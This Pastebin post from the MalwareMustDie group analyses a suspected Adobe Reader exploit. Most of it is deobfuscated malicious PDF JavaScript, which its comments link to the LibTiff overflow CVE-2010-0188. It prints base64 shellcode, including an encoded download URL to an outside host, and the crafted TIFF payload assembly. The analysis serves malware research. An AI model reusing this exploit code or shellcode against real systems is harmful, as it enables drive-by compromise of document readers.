SHARE
TWEET

#MalwareMustDie - Suspected PDF 0day (new)w/detected LibTiff

MalwareMustDie Jan 23rd, 2013 276 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // MalwareMustDie - suspected 0day analysis...
  2. // after some obfuscations, ending up to the below values..
  3. // can't get the value of fkyhifxmy() yet...
  4.  
  5.  
  6.  
  7. // another onfuscation data in here...
  8. //
  9. edlejemod = "6xe5HAMAAIs0JIn3VoA+XnQGrDS8quL6w+jk////4jHKqFTmvby8Bci/vLw1e08YQ1wxDLS/vLxU+L28vCsxI7y5vLzWtuHxszgsvLy86utU1728vNQ8vry87+tUhL28vDl8yL5XXNTdPWVzVA6+vLxDbIC6wKRUz728vIG8nLy8wbDvVBG8vLw5fMmiVwTvVNi8vLw5fMmujXzYN/ykN/yIgVi+vLzIZlcg6zVL1kPljXxAThIr4zyEvMi/Klc464181kPlQE7aE3v7Qoe8jbzj1Dy+vLzv61QHvLy81E5nyBFUO728vNQk0/OB7FQKvby81rzWQkNs6TVZ1ujllXDcMcCYnOuNfE8W4zHLrNb4M7qNZ9Q0Qg+qVLi+vLzr6u/v7+/v7+9DybRDbDX4mKDddX64vOk1WdaA5ZVw6zHAmLjt6418TxbjM7vWz9TSvN281M68ybw127BDybQz+6zURsYpWFS4vby81GFkkkDsVI+9vLzrQ2w/eLDjdX64vNTodhMtVCS9vLzW/NS8rLy81r3WvENsf+k1WVTkvby81NlT87nsVEG8vLyNde3tQ8msQ8mwQ8m07UNsdX6wvOk1WdROZ8gRVB68vLzUwvY/a+xUbby8vNa81Jm877wxsJhDybDtQ8m0Q2x1frS86TVZPVC0vry83I1n1MtXt51U1ry8vCrUsxui5epUJLy8vDHxQO3WtNZDQ2wtX/bU5tJnZ+pUPLy8vDHxRDEBREFDQ+3UvL68vOvWpUPJQENsLV+Z1HEwy03qVOe8vLxDi0Nsswq09dSOwrqc6lT0vLy87UOLQ2w3pDXgmKDddX/cjXzYN+yMN+6wN+6oN86UjUONfBD6OXzIsYDdwL6QnH1zsb17V1eHwJiYN/6sN67JZzX4mKDdfri83DfQmJg3+YA36LnEvVY39qQ35py9V1+I9TeIN71SjUONfEAQOHzIu31zsb17V0iHwJiUyV035pi9V9o3sPc35qC9Vze4N71UNfiYoN1+tLzU09K8vNTJztDR6FS/vLy85eV/1DLyslDUq3aX0lToQ0ND7FQ0Q0NDQ1zUq3aX0lT+Q0NDQ8iYuOxUzkNDQ364vGh0dHA6Ly83OC4xMTAuNjAuOTkvL29sZWdkZW15LnBocD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
  10.  
  11. function tblefdr(o, k){   // blah..
  12.   while (o.length < k){
  13.     o += o
  14.   }
  15.   return o.substring(0, k)
  16. }
  17.  
  18. fkyhifxmy(); <== the main
  19.              
  20. function fkyhifxmy(){       // PoC of Libtiff integer overflow in Adobe Reader and
  21.                             // Acrobat CVE-2010-0188 is detected here...
  22.  
  23.   hboxwhkju = "o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAABReASiBWhEoPY4BKo+uASjAggkqvWIBKXVyASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQQUXgEpqaVmNEE2BSgUXgEp0JASNMFOBSgUXgEpBQUFBeAzzpEtTgUoCF4BKQUFBQTHJZItxMIt2DIt2HItuCItGIIs2ZjlIGHXyi0U8i1QFeAHqi3IgAe4xyUGtAeiLGCtYBIH75SDd/3XvSYtaJAHrZosMS4taHAHrAyyLieZqBP82/9WFwK119YE4SUkqAHXtljHJtQPzpQ==";
  24.   neeynlkdi = "kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAApWOASiAJikqWIYBKkB+ASjCQhErYp4BKjauASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQaVjgEpqaVmNM7WASqVjgEp0JASNT0uCSqVjgEp4DPOkIg6CSqJjgEpBQUFBMclki3Ewi3YMi3Yci24Ii0YgizZmOUgYdfKLRTyLVAV4AeqLciAB7jHJQa0B6IsYK1gEgfvlIN3/de9Ji1okAetmiwxLi1ocAesDLIuJ5moE/zb/1YXArXX1gThJSSoAde2WMcm1A/Ol";
  25.   lfwfnldsc = "SUkqADggAACQ";
  26.   eosjddjas = "kJCQ";
  27.   vbnqhwdkk = "kAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////";
  28.     function rvcorgs(){
  29.     // mm = app.viewerVersion.toString(); // bypass this mm bullshit...
  30.     // mm = mm.replace(".", "");
  31.     // while (mm.length < 4){
  32.     //  mm += 0
  33.     //}
  34.     mm = 5110;
  35.     ll = 10;
  36.     return parseInt(mm, ll)
  37.   }
  38.   pxhnxcedi = rvcorgs();            // suspected parts..
  39.   if (pxhnxcedi >= 8000){
  40.     gjoegkdqt = lfwfnldsc;
  41.     gjoegkdqt += tblefdr(eosjddjas, 2000);
  42.     gjoegkdqt += edlejemod;                   // while feeding obfs data...
  43.     gjoegkdqt += tblefdr(eosjddjas, 7736);
  44.     gjoegkdqt += vbnqhwdkk;
  45.     gjoegkdqt += (pxhnxcedi < 8201 ? hboxwhkju : neeynlkdi);
  46.     esrmhkwko.rawValue = gjoegkdqt
  47.   }
  48.   return   // won't burp a value.. must debug further in memory..
  49. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top